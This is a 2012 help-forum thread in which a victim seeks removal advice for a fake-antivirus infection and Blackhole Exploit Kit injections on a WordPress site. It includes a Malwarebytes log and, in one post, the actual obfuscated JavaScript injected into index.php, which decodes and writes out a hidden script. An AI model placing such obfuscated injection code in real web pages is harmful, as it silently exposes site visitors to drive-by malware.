8 replies to this topic

[Esinem]

I can find very little info on Blackhole Exploit Kit (type 2115). It appeared after I got a pop-up on my web site offering Smart Protection 2012 (spoof AV malware) and warning of dozens of infections, which I didn't run. Does anyone have any info on removing it?

I am now getting malicious obfuscated scripts inserted in my WordPress php files, e.g. index.php. As quick as I edit them they reappear. My hosts have run various scan on my VPS and we thought we had all the culprits. Obviously not. It also seems that my PC is getting re-infected, in spite of all clears:

Malwarebytes Anti-Malware 1.60.1.1000
www.malwarebytes.org

Database version: v2012.02.09.07

Windows 7 x64 NTFS
Internet Explorer 8.0.7600.16385
Bruce :: WORK-PC [administrator]

09/02/2012 23:25:06
mbam-log-2012-02-09 (23-25-06).txt

I also run TalkTalk's suite by F-Secure.

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 201679
Time elapsed: 3 minute(s), 8 second(s)

Memory Processes Detected: 1
C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe (Trojan.FakeAlert) -> 4020 -> Delete on reboot.

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Protection 2012 (Trojan.FakeAlert) -> Quarantined and deleted successfully.

Registry Values Detected: 1
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|F4D55EFF00015B2B0004361DA6014588 (Trojan.FakeAlert) -> Data: C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe -> Quarantined and deleted successfully.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 1
C:\ProgramData\F4D55EFF00015B2B0004361DA6014588\F4D55EFF00015B2B0004361DA6014588.exe (Trojan.FakeAlert) -> Delete on reboot.

(end)

Can anyone tell me if the site is infecting my PC or vice versa? Given much of the problem is definitely on the server, I can't supply the usual reports you require, AFAIK. What info can I provide to assist?

I have attached the reports from my PC

Thanks in advance.

Attached Files

•  mbam_log_2012_02_09__23_25_06_.txt   2.79K   1 downloads
•  mbam_log_2012_02_15__19_22_05_.txt   1.95K   1 downloads
•  mbam_log_2012_02_15__20_12_38_.txt   1.8K   1 downloads
•  mbam_log_2012_02_16__05_09_33_.txt   2.52K   1 downloads
•  mbam_log_2012_02_16__16_21_27_.txt   1.77K   1 downloads
•  checkup.txt   913bytes   0 downloads
•  OTL.Txt   88.46K   1 downloads
•  Extras.Txt   53.43K   1 downloads

Edited by Esinem, 16 February 2012 - 11:08 PM.

[sempai]

Hi,

Is this an office or business computer?

[Esinem]

Here's what it inserts in index.php

<

CODE

script>var a='';var b='a3t.tmddri5g%e%%%%22Aaeh6c2%%32d%iir0wvf3%32%h2r%%a30%/l/p8t232D0e2fe%%s..3ret2t2o2CEr%twsai6tw2i5mDEefchwirF2D02e2a33mmDpaae%iud%h2b233Cs2/ai%3%%D0%fr2r%23tmpDe%h2%%r0/ ';var c='1382650749';for(var i=0;i<17;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*17)+i);document.writeln(unescape(a));</script>

[Esinem]

My home PC and on a web site I run. I see another poster has this problem. This seems to be a new variant with little info as yet :-(

[Esinem]

My hosting company just did another scan and only found infection in a.php. I am hoping this is what has been reinfecting it and all is well now. I hope this helps others

[sempai]

Thank you for letting us know.

[Esinem]

If I get any more intel on this I'll let you know. So far so good but there was a delay of several hours between reinfections last time. Security has been beefed up...fingers crossed.

[Esinem]

Eureka! The infection hides in a timthumb.php file and appears to be uploaded via FTP. It then infects index.php with obfuscated code which redirects your site or whatever.

This pages tells you how to sort it out: http://codegarage.co...-vulnerability/ They also have a WordPress plugin that seems to work

[Esinem]

Eureka! The infection hides in a timthumb.php or thumb.php files and appears to be uploaded via FTP. It then infects index.php with obfuscated code which redirects your site or whatever.

This pages tells you how to sort it out: http://codegarage.co...-vulnerability/ They also have a WordPress plugin that seems to work